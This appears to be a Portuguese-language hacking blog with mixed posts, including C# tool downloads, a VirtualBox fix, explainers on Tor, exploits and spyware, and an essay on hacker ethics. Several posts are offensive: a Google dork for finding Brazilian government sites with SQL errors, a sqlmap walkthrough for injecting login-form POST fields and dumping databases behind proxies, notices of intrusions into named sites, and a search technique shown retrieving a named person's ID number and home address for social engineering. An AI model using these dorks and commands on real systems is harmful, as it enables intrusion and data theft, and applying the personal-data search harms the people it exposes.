Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

quinta-feira, 28 de fevereiro de 2013

LackingWeb Pequeno webbrowser feito em c# Programa + Fonte

LackingWeb Pequeno webbrowser feito em c# Programa + Fonte

Navegador web simples feito em C#
Campos: combo com motores de busca para escolher
Textbox para pesquisa botão de pesquisa e de controle.

Fonte:Grupo de Estudos Lacking Face &Anonymous Brasil.

Grupo livre pra todos que querem aprender!
Nossa única exigência é que se sinta bem!
Nosso alvo é espalhar conhecimento, pra juntos, podermos lutar contra injustiças em geral! Unidos como um, divididos por zero!
Somos muitos!

LackingMysql Consulta em BD Mysql programa + fonte

LackingMysql Consulta em BD Mysql programa + fonte

Feito em C#


Conecta em bancos de dados mysql.
Campos, Servidor,Login,Senha,SQL

Feito para estudantes de programação C#

Necessita: Microsoft .NET Framework 4


Link Download:https://www.facebook.com/groups/GdELackingFaces/577583682254313/

Créditos Grupo de Estudos Lacking Face e Anonymous Brasil

Grupo livre pra todos que querem aprender!
Nossa única exigência é que se sinta bem!
Nosso alvo é espalhar conhecimento, pra juntos, podermos lutar contra injustiças em geral! Unidos como um, divididos por zero!
Somos muitos!

sexta-feira, 15 de fevereiro de 2013

Dorks buscar sites do governo brasileiro com erros sql.

Dorks buscar sites do governo brasileiro com erros sql.

Dork: site:gov.br & intext:"SQL syntax" & +inurl:php?= +(id) -pdf -forum -softwarepublico -ppt -ftp -intext:"SQL injection"

Explicativo:

site:gov.br = restringir nossa busca somente no domínio gov.br, mas tambem pode ser usado para outros domínios.
& =  Operador logico.
intext:"SQL syntax" =  Procurar no texto interno da pagina o conjunto de palavras "SQL syntax".
+inurl:php?=  = "+" força o motor de busca pesquisa a determinada palavra ou operador, inurl:palavra = pesquisar na URL da pagina.
 - = Retira da pesquisa assim facilita o filtro.
 
 

quarta-feira, 2 de janeiro de 2013

Solucionando “Erro: Kernel driver not installed (rc=-1908)” do Virtualbox 3.2.4 no Ubuntu

Solucionando “Erro: Kernel driver not installed (rc=-1908)” do Virtualbox 3.2.4 no Ubuntu

Recentemente trabalhando com minhas máquinas virtuais no Virtualbox 3.2.4, da Sun/Oracle, me deparei com a seguinte mensagem de erro abaixo ao tentar executar qualquer uma máquina virtual:
Imagem Erro: Kernel driver not installed (rc=-1908)
Após algumas varreduras no Oráculo (Google), cheguei a seguinte solução quer compartilho com vocês:
1º Passo:
Verificar através do comando “cat /etc/group” se o seu usuário pertence ao grupo de usuários vboxusers. Caso não, execute o comando abaixo:
sudo addgroup usuário vboxusers
2º Passo:
Executar o comando da mensagem de erro como usuário root.

sudo /etc/init.d/vboxdrv setup
3º Passo:
Da permissão de leitura, escrita e execução ao o usuário root e ao grupo de usuários da pasta /dev/vboxdrv

sudo chmod 770 /dev/vboxdrv
Pronto! Agora você já pode voltar a brincar com as suas máquinas virtuais. ;) 

Fonte:http://phpimenta.wordpress.com/2010/06/20/corrigindo-erro-kernel-driver-not-installed-rc-1908-do-virtualbox-3-2-4-no-ubuntu-10-04/


Se nada disso der certo.
Tente esses

1 -

sudo dkms install virtualbox/4.1.2


2-Tentar instalar leitor de cabeçalhos linux:
sudo apt-get install linux-headers-$(uname -r)

sábado, 29 de dezembro de 2012

O Braço do Wikileak no Brasil.

WikiLeaks foi fundado para disseminar documentos, fotos e vídeos que têm significado político ou social. Web: http://wikileaks.org/wiki/Category:Brazil
Missão
WikiLeaks, publicados por Sunshine Press, é uma organização sem fins lucrativos financiada por defensores dos direitos humanos, jornalistas investigativos, tecnólogos eo público em geral.
Através de seu apoio que temos exposto injustiça significativa em todo o mundo combatendo-off com sucesso mais de 100 ataques legais no processo. Nosso trabalho produz reformas diariamente e é o destinatário de vários prêmios, incluindo o Índice de 2008 sobre censura Economista-Liberdade de Expressão Award, bem como a Anistia Internacional 2009 New Media Award. Nós não aceitamos governo ou financiamento corporativo. Nós nunca ter comprometido uma fonte.
Informações gerais
WikiLeaks foi fundado para disseminar documentos, fotos e vídeos que têm significado político ou social. Web: http://wikileaks.org/wiki/Category:Brazil WikiLeaks - Abrir os governos.
Descrição
Página oficial do Facebook. WikiLeaks foi fundado por Sunshine Press para disseminar documentos, fotos e vídeos secretos que têm significado político ou social. Web: http://wikileaks.org/wiki/Category:Brazil

Informações de contato

domingo, 23 de dezembro de 2012

Momento Wikipédia! O que é TOR?

Momento Wikipédia!  O que é TOR?


Momento Wikipédia!
O que é TOR?

The Onion Router, também conhecido pela sigla Tor, é uma rede de computadores distribuída com o intuito de prover meios de comunicação anônima na Internet. A maioria das distribuições GNU/Linux disponibilizam pacotes do Tor, embora haja versões para diferentes sistemas operacionais, tais como Windows e Mac OS. A rede Tor é uma rede de túneis http (com tls) sobrejacente à Internet, onde os roteadores da rede são computadores de usuários comuns rodando um programa e com acesso web (apenas). O objetivo principal do projeto é garantir o anonimato do usuário que está acessando a web.

Funcionamento

O Tor-cliente é um programa que deve ser instalado no computador e que funciona como um proxy socks 5 para este. É fornecido um bind, geralmente na porta 9.050 local da máquina. Em seguida, os programas (web browser, emule etc.) devem ser configurados para usar um servidor proxy socks 5 e apontados para o endereço localhost (127.0.0.1). Às vezes, ele também possui um navegador incluído, tal como Aurora e Mozilla Firefox.

A partir daí, o Tor vai rotear todo o tráfego do computador através de túneis http da rede Tor até o destino, na rede "convencional". Se o usuário entrar em site do tipo http://myip.is/ e http://meuip.com.br/, vai ver que o seu endereço vai aparecer diferente do seu endereço real (anonimato). O endereço que vai aparecer é o endereço do nó Tor por onde ele saiu da rede Tor para a rede "convencional". O tráfego é roteado por vários nós Tor, o que pode deixar o acesso bem lento, às vezes.

Ou seja, para o servidor acessado você terá o endereço IP de um do nó de saída, como a rede Tor tem uma topologia caótica (aleatória), não se pode escolher o IP final ou de qual região da rede será. Por exemplo, usando a rede Tor você não pode escolher ter um IP de uma máquina localizada em um país ou região específica.

Ainda é possível aumentar a rede, abrindo seu computador para uso de outros usuários do Tor.

Há uma espécie de domínio com terminação .onion, acessível apenas pelo Tor. Páginas com este domínio são chamadas de Deep Web.
Características

Uma observação importante: o usuário deve ter cuidado se for usar a rede Tor para tráfegos não-criptografados, pois a segurança em nível de transporte que o Tor implementa é só até o nó Tor de saída (exit node). Desse ponto até o destino da rede "convencional", o tráfego é encaminhado da maneira original como foi entregue ao Tor na máquina local. Então, se o usuário configurar o seu Tor para operar como servidor de relay, terá a possibilidade de logar o tráfego original de todas as pessoas que estiverem passando por túneis cujo nó de saída seja o seu nó Tor.

Tor é um pacote de ferramentas para organizações e pessoas que desejam mais segurança na Internet. Com ele, o tráfego de dados na navegação de mensageiros instantâneos, IRC, navegadores, SSH e outros aplicativos que usam o protocolo TCP se tornará anônimo. Ele também fornece uma plataforma na qual os desenvolvedores podem construir novos aplicativos baseados no anonimato, segurança e privacidade. O tráfego é mais seguro ao se usar Tor, pois as comunicações são ligadas através de uma rede distribuída de servidores, chamados roteadores onion (onion router), um projeto que visa à proteção e ao direito do usuário de permanecer anônimo na Internet.

Ao invés de direcionar a rota da fonte para o destino, os pacotes de dados da rede Tor assumem um caminho aleatório através de vários servidores que cobrem os traços para que nenhum observador inoportuno saiba de onde vieram e para onde vão os dados. O propósito dessa tecnologia é proteger os usuários da Internet contra a "análise de tráfego", uma forma de monitoramento de rede que ameaça o anonimato e a privacidade, atividades comerciais confidenciais e relacionamentos, além da segurança de Estado.

A análise de tráfego é usada diariamente por corporações, governos e indivíduos que desejam manter um banco de dados do que fazem pessoas e organizações na Internet. Ao invés de procurar o teor das comunicações, a análise de tráfego rastreia de onde vêm e para onde vão os seus dados, assim como quando foram enviados e a quantidade.

Por exemplo, companhias usam a análise de tráfego para armazenar um registro de que páginas da Internet o usuário visitou para construir um perfil dos seus interesses. Suponha-se que uma indústria farmacêutica use essa análise ao pesquisar um nicho de mercado, monitorando o website do concorrente para saber quais produtos lhe interessam. Uma lista de patentes pode ser consultada, rastreando todas as buscas feitas.

Tor dificulta a análise de tráfego ao evitar o rastreamento de dados online, permitindo que o usuário decida se deseja se identificar ou não ao se comunicar. A segurança é aperfeiçoada enquanto mais pessoas se voluntariam a executar servidores. Parte do objetivo do projeto Tor é fazer um experimento com o público, ensinando as melhores saídas para obter privacidade online.
Opera Tor

Opera Tor é um programa de computador que combina o programa de anonimidade Tor com o navegador Opera e deve ser executado diretamente de uma mídia portátil, como um pen drive.

Por ser executável diretamente de uma mídia portátil, Opera Tor não precisa nem mesmo ser instalado no computador, de tal forma que seu uso não altera em nada na configuração do sistema, dos outros navegadores ou arquivos. Programas baseados em Tor tem sido usado por internautas de países submetidos a ditaduras para burlar a censura do governo, uma vez que o IP do internauta é totalmente mascarado. Sendo assim, as páginas visitadas não poderão reter informação do internauta. Apenas o provedor do usuário terá acesso aos dados e detalhes da navegação.

No âmbito do estudo da Segurança da Informação pode-se questionar, porém, se governos e desenvolvedores não teriam acesso aos dados navegados, mas até hoje não houve nenhuma evidência neste sentido. De qualquer forma, esta tem sido uma ferramenta para internautas de diversos países acessarem a internet sem censura e jornalistas divulgarem notícias desagradáveis a governos em Estados ditatoriais, sendo uma verdadeira arma de informação a favor da democracia.

Mundo INURL Conceito,Principais operadores,Pesquisa MD5,Pesquisa de arquivos

Mundo INURL Conceito,Principais operadores,Pesquisa MD5,Pesquisa de arquivos


*Conceito INURL.
*Principais operadores.
*Pesquisa MD5 e outras criptografia.
*Pesquisa de arquivos determinando o arquivo seja PDF ou TXT "fica de sua preferência a extensão".


*Conceito INURL:

Algumas dicas que servem para a maioria dos buscadores, incluindo o Google,
È usar apenas palavras chaves na sua busca, em vez de buscar, por exemplo, Golpe do Estado busque
Por Golpe Estado. O Google e alguns poucos outros tem uma melhor vantagem, ele faz um filtro de busca,
Retirando informações pequenas, como de, da/do, com, dessa forma não é totalmente necessário fazer o filtro
Manualmente, porém a pesquisa pode se tornar um pouco mais rápida.
"Ou seja para fazer uma pesquisa não precisa digitar uma pergunta na barra de pesquisa."

Exemplo
"Seu intuito é encontrar um sites com musicas da banda Metallica"

- ERRO: baixar musicas da banda Metallica: De fato vem sites com o conteúdo citado porem vem um resultado meio sujo.

"Devemos usar o poder das palavras chaves"

- Certo: musicas Metallica mp3 ou somente Metallica mp3: O resultado fica um pouco mais limpo pois vai direto para blogs
referente downloads.

*2 - Reforçando a pesquisa utilize: Aspas duplas, digamos queres achar uma pessoa pelo nome
Dados que você tem Nome: zé dirceu

Somente isso,como inicia pesquisar no Google "ZÉ DIRCEU" o resultado não mudou muito,com aspas.
Agora vamos ser um pouco mais inteligentes é usar em vez de zé vamos usar "JOSÉ DIRCEU",
Pois zé e abreviação de zé digamos assim.
Vão falar nossa não mudou muito, lembra que eu falei dos poderes de uma palavra chave vamos combinar
"JOSÉ DIRCEU" com algo comum de qualquer brasileiro

pesquisa: "JOSÉ DIRCEU" +cpf
+cpf = Obriga o o google a pesquisa a palavra CPF junto com termo "JOSÉ DIRCEU",
assim tú garante que o Google inclua CPF na pesquisa
Resultado:
JOSÉ DIRCEU DE OLIVEIRA E SILVA, brasileiro, casado, advogado, CI
n.º 3.358.423 SSP/SP, nascido em 16/03/1946, filho de Castorino de
Oliveira e Silva e Olga Guedes da Silva, residente na SQS 311, Bloco I,
apto. 302, Brasília/DF;

"Com isso já é possível gerar uma engenharia social mais isso em outro documento."

--------------------------------------------------------------------------------------------------------------------------------------

*Principais operadores.

// "ASPAS"
Pesquisar uma palavra ou frase exata: "consulta de pesquisa" Use aspas.
ex:[ "olha que coisa mais linda" ]


// -EXCLUIR
Excluir uma palavra -pesquisa: Adicione um hífen (-) antes da palavra para excluir.
ex:[ pandas -site:wikipedia.org ]   2 [ velocidade jaguar -carro ]     

Incluir palavras similares: ~consulta Normalmente, algumas palavras da consulta original poderão
ser substituídas por sinônimos. Adicione um til (~)
ex:[ fatos ~alimentares ] inclui resultados para "fatos nutricionais"


// SITE:gov.br
Pesquisar em um site ou domínio: site: consulta Inclua "site:" para procurar informações em um único website.
ex:[ poupa tempo site:sp.gov.br ]    

// "CORINGA*BATIMAN"
"Preencher" os espaços: consulta * consulta Use um asterisco (*) dentro da consulta como espaço
reservado para termos desconhecidos ou "curinga".
ex:[ "quem tem * vai a Roma" ]          

// OR
Pesquisar por uma das palavras consulta OR consulta: Para pesquisar por páginas que contenham apenas uma palavra
entre várias palavras, inclua OR.
ex:[ sede olimpíadas 2014 OR 2018 ] 2 [ "copa do mundo 2014" OR "olimpíadas 2014" ]  

// ..INTERVALO
Pesquise por um intervalo numérico número..número:Separe os números por dois pontos (sem espaços) para ver
resultados dentro do intervalo especificado de datas.
ex:[ câmera $50..$100 ] 2 [ vencedores copa do mundo ..2000 ]  

// FILETYPE OU EXT
Pesquisa por arquivos determinando a extensão ext: ou filetype: Exemplo, apostilas ext:pdf ou filetype:pdf,
"introdução mysql" ext:pdf


// INTEXT:
Pesquisa de texto especifico intext:"Machado de Assis".

//INTITLE:
Termo do html Machado de Assis livros do valor X ou Y
Pesquisa por texto especifico no title de sites intitle:"Machado de Assis livros"



Esses são os comandos básicos para sobrevivência em pesquisa.
--------------------------------------------------------------------------------------------------------------------------------------

*Pesquisa MD5 e outras criptografia.
Muito simples: "ff9830c42660c1dd1942844f8069b74a"
link: https://www.google.com.br/search?q="ff9830c42660c1dd1942844f8069b74a"
Pequisar site que são relacionados ao assunto md5 ou criptografia:

pesquise pelo termo:decrypt md5

*Pesquisa de arquivos determinando o arquivo seja PDF ou TXT "fica de sua preferência a extensão".
Vamos pesquisa apostilas

"Determinar o assunto depois a extenção" ext:pdf

"cpf" ext:pdf
ou
"cpf" filetype:pdf

Agora vamos combinar com o operador site: que vai determinar o site o domínio especifico da pesquisa.

site:gov.br "cpf" ext:pdf
ou
site:gov.br "cpf" filetype:pdf

Vamos restringir mais pois gov.br sera referente a muito subdomínios vamos nos focar governo de São Paulo.

site:sp.gov.br "cpf" ext:pdf
ou
site:sp.gov.br "cpf" filetype:pdf

Mundando foco da pesquisa busca de apostilas para estudos.
"Vamos tirar o termo site pois queremos pegar apostilas independente do domínio."

"Introdução php" ext:pdf
ou
"Introdução php" filetype:pdf

Mudando a palavra php para MYSQL ou C#,PERL sua pesquisa fica dinâmica.


A pesquisa é isso um pouco de operador é um pouco de necessidade.

By:Cleiton Pinheiro

Referencias:
http://www.google.com/intl/pt-br/insidesearch/tipstricks/something-to-do.html
http://blog.inurl.com.br/2011/01/o-que-e-string.html

sexta-feira, 21 de dezembro de 2012

COMANDOS - SQLMAP Injetando via POST.

sqlmap de uma forma diferente

COMANDOS   -   SQLMAP Injetando via POST.


COMANDOS   -   SQLMAP Injetando via POST.

sqlmap.py --url *************** --current-db
sqlmap.py --url *************** -D 'databasedosite' --tables
sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite' --columns sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite" -C 'colunasdosite' --dump


ANALISANDO DADOS PARA O ATAQUE VIA POST

Vamos ao agora enviar via post.
Exemplo uma tela de login e senha!, como injetar com sqlmap ??
alvo:http://www.pagina.com.br/login.phpUrl para onde é enviado os posts usuario e senha, como saber qual url. 
Abra o codigo fonte e veja analise o fonte


<form  action="validar/lt.php" method="post"  >
<input type="text" name="login">
<input type="text" name="senha">
</form>

No caso para onde é enviado os posts "campos login e senha".

sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs
#2* e #1* Indica que são campos posts e os mesmo devem ser injetados


DEIXANDO SEU AGENT HTTP RANDÔMICO
Vamos incrementar o comandos no teste.--ramdon-agent ou seja ele vai ramdomizar seu Agent http://en.wikipedia.org/wiki/User_agentEX:
Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
A cada requisição ele vai mudar seu user agent:
sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs --random-agent


SETANDO PROXY
Para ficar não ficar exposto utilizer o parâmetro proxy sempre.--proxy="SEU PROXY:PORTA"
ex:
sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs --random-agent --proxy="SEU PROXY:PORTA"

MODELO 2 DE INJETAR SQL VIA POST
Agora vamos utilizar a segunda forma de injetar via post.Lendo um arquivo de requisição post via sqlmap, com o comando "-r"Precisamos criar arquivo com o nome fica sua escolha configurado devidamente.Ex:

    POST http://www.pagina.com.br/validar/ls.php HTTP/1.1
    Host: www.pagina.com.br
    Origin: http://www.pagina.com.br/
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.54.16 (KHTML, like Gecko) Version/5.1.4 Safari/534.54.16
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOMD4054CXIAin1BB
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Referer:  http://www.pagina.com.br/login.php
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    Cookie: PHPSESSID=ea4b4f69b0ed5e611b0d1b5ff5c7e9f9;
    Pragma: no-cache
    Connection: keep-alive
    Proxy-Connection: keep-alive
    Content-Length: 468

    ------WebKitFormBoundaryOMD4054CXIAin1BB
    Content-Disposition: form-data; name="login#1*"

    admin
    ------WebKitFormBoundaryMDad4054CXIAin1BB
    Content-Disposition: form-data; name="senha#1*"

    1234

depois de salvar o conteúdo acima no arquivo post.txt,Vamos executalo
../sqlmap.py -r post.txt --dbs --random-agent --proxy="SEU PROXY:PORTA"


"Conhecimento livre & Com responsabilidade"

quinta-feira, 20 de dezembro de 2012

Momento Wikipédia! O QUE É UM EXPLOIT ?????

O QUE É UM EXPLOIT ?????
Momento Wikipédia!
O QUE É UM EXPLOIT ?????

Um exploit, em segurança da informação, é um programa de computador, uma porção de dados ou uma sequência de comandos que se aproveita das vulnerabilidades de um sistema computacional – como o próprio sistema operativo ou serviços de interação de protocolos (ex: servidores Web). São geralmente elaborados por hackers como programas de demonstração das vulnerabilidades, a fim de que as falhas sejam corrigidas, ou por crackers a fim de ganhar acesso não autorizado a sistemas. Por isso muitos crackers não publicam seus exploits, conhecidos como 0days, e o seu uso massificado deve-se aos script kiddies.

Até meados dos anos 1990, acreditava-se que os exploits exploravam exclusivamente problemas em aplicações e serviços para plataformas Unix. A partir do final da década, especialistas demonstraram a capacidade de explorar vulnerabilidades em plataformas de uso massivo, por exemplo, sistemas operacionais Win32 (Windows 9x, NT, 2000 e XP). Como exemplo temos o CodeRed, o MyDoom, o Sasser em 2004 e o Zotob em 2005.
Como atua

Para um exploit atacar, o sistema precisa ter uma vulnerabilidade, ou seja, um meio de comunicação com a rede que possa ser usado para entrar, uma porta ou um console.

Um exploit muito usado é no sistema RPC do Windows:

o usuário localiza a porta e envia à porta RPC uma sequência de bytes, que são interpretados como dados pelo servidor
quando são recebidos, estes dados deixam propositadamente o sistema em pane
o sistema passa o controle a estes próprios dados que então são uma sequência de ordem para dominar a CPU.

Desta forma esta sequência de informações toma conta do PC e abre-o para o hacker que aguarda na outra ponta.

No sistema Linux, quando existem vulnerabilidades, sempre são publicadas, como já houve no sistema Apache, Samba ou MySQL, que também apresentam vulnerabilidades e possibilita o controle do PC por um hacker remoto.

segunda-feira, 17 de dezembro de 2012

Informativo invasão www.whitehouse.gov, grupo Cyb3rGh0sts

Informativo 


Informativo invasão www.whitehouse.gov, grupo Cyb3rGh0sts




Grupo de hacker invadem servidores:

www.whitehouse.gov

Nome do grupo: Cyb3rGh0sts

By: Crlo Lvd & Syztem Schmelzer
Cyb3rGh0sts & AnonCyber

INFORMAÇÕES CAPTURADAS

Momento Wikipédia o que é Spyware ?



Spyware consiste em um programa automático de computador, que recolhe informações sobre o usuário, sobre os seus costumes na Internet e transmite essa informação a uma entidade externa na Internet, sem o seu conhecimento nem o seu consentimento.
Diferem dos cavalos de Tróia por não terem como objetivo que o sistema do usuário seja dominado, seja manipulado, por uma entidade externa, por um cracker.
Os spywares podem ser desenvolvidos por firmas comerciais, que desejam monitorar o hábito dos usuários para avaliar seus costumes e vender este dados pela internet. Desta forma, estas firmas costumam produzir inúmeras variantes de seus programas-espiões, aperfeiçoando-o, dificultando em muito a sua remoção.
Por outro lado, muitos vírus transportam spywares, que visam roubar certos dados confidenciais dos usuários. Roubam dados bancários, montam e enviam registros das atividades do usuário, roubam determinados arquivos ou outros documentos pessoais.
Com frequência, os spywares costumavam vir legalmente embutidos em algum programa que fosse shareware ou freeware. Sua remoção era por vezes, feita quando da compra do software ou de uma versão mais completa e paga.
Traduzindo ao pé da letra, Spyware significa "aplicativo ou programa espião".

Adwares

Muitas vezes usa-se de forma genérica o termo spyware para os malware e adwares, que são programas indesejáveis. Costuma-se incluir os adwares no estudo dos spywares, pois assemelham-se na sua forma de infecção e na sua forma de desinstalação. Seriam como se fossem um sub-grupo dos spywares.
Os adwares são conhecidos por trazerem na tela do usuário algum tipo de propaganda.
Como geralmente são firmas comerciais que os desenvolvem, é comum os adwares virem embutidos em diversos programas de livre download (freeware), com a autorização de seus autores.
O Kazaa oficial é um programa de compartilhamento de arquivos, sendo um exemplo do casamento de um software gratuito com adwares, pois estes lhe proporcionam uma fonte de renda.
Inicialmente os adwares procuravam exibir propagandas em janelas, chamados de banners, pequenas janelas de propagandas, embutidas em softwares de terceiros. Caso o usuário gostasse deste software, poderia adquirir uma versão mais avançada, paga, livre destas propagandas.
Posteriormente os adwares passaram a monitorar a atividade do usuário na internet, podendo desta forma mostrar propagandas personalizadas, além de enviar dados sobre hábitos do usuário a certos sites, tendo então funções de spyware e adware, de forma simultânea.
Mais adiante certos adwares passaram a exibir janela do tipo pop-up, pequena janela de propaganda solta pela tela, em vez de banners.
Um pouco mais a frente os adwares passaram a se instalar no navegador do usuário, acrescentando certas funcionalidades duvidosas, principalmente no Internet Explorer. Avanços (ou upgrades) no Internet Explorer, passaram a exigir o consentimento do usuário para a sua instalação.
Porém com o passar do tempo, os adwares sofisticaram-se, incluindo propagandas persistentes, com inúmeras variantes, onde a sua desinstalação passou a ser um tarefa bastante penosa ou mesmo impossível, sem uma ajuda externa. A insistência no aparecimento das propagandas e sua difícil desinstalação, levaram os usuários a classificá-los como pragas ou spywares e não mais como simples adwares.
Certos adwares passaram a ser instalados no Internet Explorer, quando o usuário navegava em sites maliciosos.
Os adwares se sofisticaram, tornaram-se pragas. Produzem alterações no registro do Windows e depois somem ou se escondem para garantir que as alterações não sejam desfeitas, exigindo então não mais a ação de um antivírus ou de um simples anti-spyware, mas sim de um programa específico de conserto do registro.
Por vezes os adwares exibem propagandas pornográficas, falsas propagandas de infecção do sistema por vírus, falsa propaganda de venda de produtos e passaram também a causar instabilidade no sistema, principalmente no navegador.
Suspeita-se que possam tornar o sistema do usuário aberto a ação de crackers,devido a falta de maiores cuidados na elaboração dos adwares.
Sua data de descoberta é desconhecida.

sexta-feira, 14 de dezembro de 2012

Informativo invasão megaminas.globo.com, grupo Cyb3rGh0sts

Informativo 





Grupo de hacker invadem servidores:

megaminas.globo.com

Nome do grupo: Cyb3rGh0sts

By: Crlo Lvd & Syztem Schmelzer
Cyb3rGh0sts & AnonCyber

INFORMAÇÕES CAPTURADAS

A DIFERENÇA ENTRE "http://"; e “https://”


A DIFERENÇA ENTRE "http://"; e “https://”


A DIFERENÇA ENTRE "http://"; e “https://”
Pois é, a diferença existe e é simplesmente a sua segurança!

O "s" = secure = segurança.
A sigla http quer dizer "Hyper Text Transport Protocol", que é a linguagem para troca de informação entre servidores e clientes da rede.

O que é importante, e o que marca a diferença, é a letra "s" que é a abreviatura de "Secure"! O “s” indica que os dados inseridos serão criptografados e não poderão ser interceptados.

Ao visitar uma página na web, observe se começa por: http://./ Isto significa que essa página se comunica numa linguagem normal, mas sem segurança!

ATENÇÃO = Não se deve dar o número do cartão de crédito através de uma página/site começada APENAS por http:// . Se começar por https:// , significa que o computador está conectado a uma página que se corresponde numa linguagem codificada e segura.

quarta-feira, 12 de dezembro de 2012

Hackers: A ética por trás do folclore

Hackers: A ética por trás do folclore

Hackers: A ética por trás do folclore

Monografia do curso de Segurança de Dados 1/02

Fabrício César Ferreira Anastácio *
Departamento de Ciência da Computação
Universidade de Brasília
Setembro de 2002

Com o crescimento da Internet e a consolidação da chamada Sociedade da Informação muito tem sido dito sobre os tais dos "hackers". "Piratas da Rede", "meliantes digitais" e outras denominações que variam do ridículo ao romantismo cibernético contribuem para a criação de uma atmosfera mítica coberta de mistério e, certamente, equívocos em torno destes personagens. É comum deparar-se na mídia com este termo sendo usado num sentido bastante pejorativo, conotando indissociável relação com o crime e a ilegalidade. Seja nos filmes de Hollywood ou no jornal cotidiano, os hackers usam seu profundo conhecimento do funcionamento dos computadores e das redes de comunicações para perpetrarem sofisticados delitos, causando danos a terceiros e/ou enriquecendo num digitar de teclas. Colocando o sensacionalismo e a extravagância de lado, isto tudo poderia estar correto exceto pelo fato de que os agentes de atividades desta estirpe não são hackers, mas sim "crackers".
Esta confusão não é apenas um erro de tradução, como afirma Rezende em [1], já que ocorre mesmo em sua língua original, observando-se isso claramente na reportagem de popular, ainda que não muito confiável, órgão de impressa norte-americano referenciada pelo próprio texto citado. Na verdade, segundo Pekka Himanen (foto), filósofo finlandês, em [2], a origem deste equívoco remontaria a meados dos anos 80, quando surgiram os primeiros crimes computacionais, e a mídia, não sabendo como designar tais criminosos, aplicou o termo de forma um tanto infeliz.
Ora, se não são os tais meliantes digitais, afinal, quem são os hackers?
A tradução literal da palavra poderia ser algo como talhador, lenhador, o que não deixa de ter alguma relação com o sentido originalmente concebido. Este sentido surgiu no início dos anos 60 no MIT, sendo usado como autodenominação por um grupo de programadores apaixonados por sua atividade. Com uma certa boa vontade, pode-se imaginá-los como "lapidários" de código escrito em linguagens de programação. Deixando-se tomar pela analogia inspiradora feita por Rezende em [1], se uma linguagem de programação puder ser comparada a uma linguagem natural, sendo o código-fonte comparado a um texto, um programa a um livro e um programador a um escritor, um hacker seria um poeta desta literatura.

Um hacker é uma pessoa para quem a programação é uma paixão e que compartilha os frutos de sua paixão com os outros, é um título honorário, como reforça Himanen em uma entrevista em [3]. Não é um criminoso de computador. Em [2], Himanen traz o que seria a definição de hacker compilada pelos próprios: "uma pessoa que programa entusiasticamente e que acredita que compartilhar informação é um poderoso bem concreto e que seja um dever moral compartilhar a sua perícia escrevendo software livre e facilitando o acesso a informação e a recursos computacionais onde for possível", é alguém que "acha programar intrinsecamente interessante, empolgante e divertido" [2].
Um outro ponto destacado pelo filósofo finlandês é que um hacker não está limitado ao mundo da informática. Praticamente, em qualquer área de atividade humana, podem ser encontrados hackers. Eles seriam "experts" ou entusiastas de qualquer tipo. Pode haver "hacker carpinteiro", "hacker jornalista", "hacker gerente", "hacker astrônomo" ou hacker qualquer outra coisa. Em suma, "uma pessoa é hacker quando é apaixonada pelo que faz e quer se realizar naquele trabalho" [3].
No entanto, esta definição ainda não é muito conhecida ou difundida nos meios "formadores de opinião". Pior é quando, mesmo sendo conhecida, ela é deliberadamente ignorada em prol de uma suposta simplicidade destinada a "facilitar" o entendimento por parte do leitor/espectador leigo. Como se não bastasse a argumentação absurda e contraditória de justificar a criação de confusão para elucidar a compreensão, este recorrente engano tem significativas conseqüências. Além de dificultar a correta assimilação de conceitos e dinâmicas da comunidade da Rede, isto mistura meros utilizadores mal-intencionados (ou, por vezes, apenas curiosos demais) de ferramentas prontas disponíveis aos montes na Internet, os chamados "script kiddies", com os verdadeiros crackers (que podem ocasionalmente ser hackers).

Estes crackers é que são os responsáveis pelos verdadeiros crimes. São eles que dão volumosas cifras de prejuízo a empresas e governos e, muitas vezes, agem amparados por quadrilhas altamente especializadas. Assim, ao colocar estas "tribos" totalmente diferentes em condição de igualdade, a mídia acaba encobrindo a complexidade do sério problema de segurança aí existente e dificulta sobremaneira o esclarecimento de quem são os reais responsáveis por ele, sendo crassamente injusta.
Injustiça esta que se torna ainda mais evidente diante da elucidação das contribuições fundamentais dadas pelo hackers para o embasamento tecnológico da sociedade emergente. Como destacado por Himanen em [2], alguns dos símbolos mais conhecidos dos tempos atuais - a Internet, o computador pessoal e softwares como o sistema operacional Linux - foram criados primordialmente por alguns entusiásticos indivíduos que começaram a concretizar suas idéias com outros de pensamento semelhante, trabalhando em um ritmo livre. Rezende, em [1], compara a atuação dos hackers em relação ao software com a ação da seleção natural na evolução das espécies naturais. Eles seriam uma forma de agentes seletores, que garantiriam a sobrevivência dos mais aptos, descobrindo vulnerabilidades e falhas de segurança nos softwares em uso e reportando os problemas encontrados aos respectivos desenvolvedores, chegando mesmo a sugerir soluções e correções.
Rezende destaca que, por vezes, para amenizar o erro de designação, tais indivíduos são chamados de "hackers éticos". No entanto, isto só piora a confusão, pois reforça a idéia de que o hacker por natureza não é ético. Tal suposição não poderia ser mais difamatória, pois não apenas o hacker é ético em sua natureza original, mas se pode até mesmo falar de toda uma "Ética Hacker".
Para entender melhor esta ética, é necessário antes conhecer melhor o contexto histórico e social no qual ela surge. O pensamento ainda predominante na sociedade atual e que marcou distintamente toda a Era Industrial, de acordo com Himanen, é o que Max Weber chamou de "Ética de Trabalho Protestante" em sua obra The Protestant Ethic and the Spirit of Capitalism (1904-1905). Esta ética baseia-se fortemente na idéia de que o trabalho é a coisa mais importante na existência de uma pessoa. É ele que dá sentido à vida. O trabalho é visto como um fim em si mesmo. Não importa no que ele consista, ele deve ser feito da melhor maneira possível, sem questionamento ou lamúrias. É uma questão de consciência, é como um "chamado" divino.
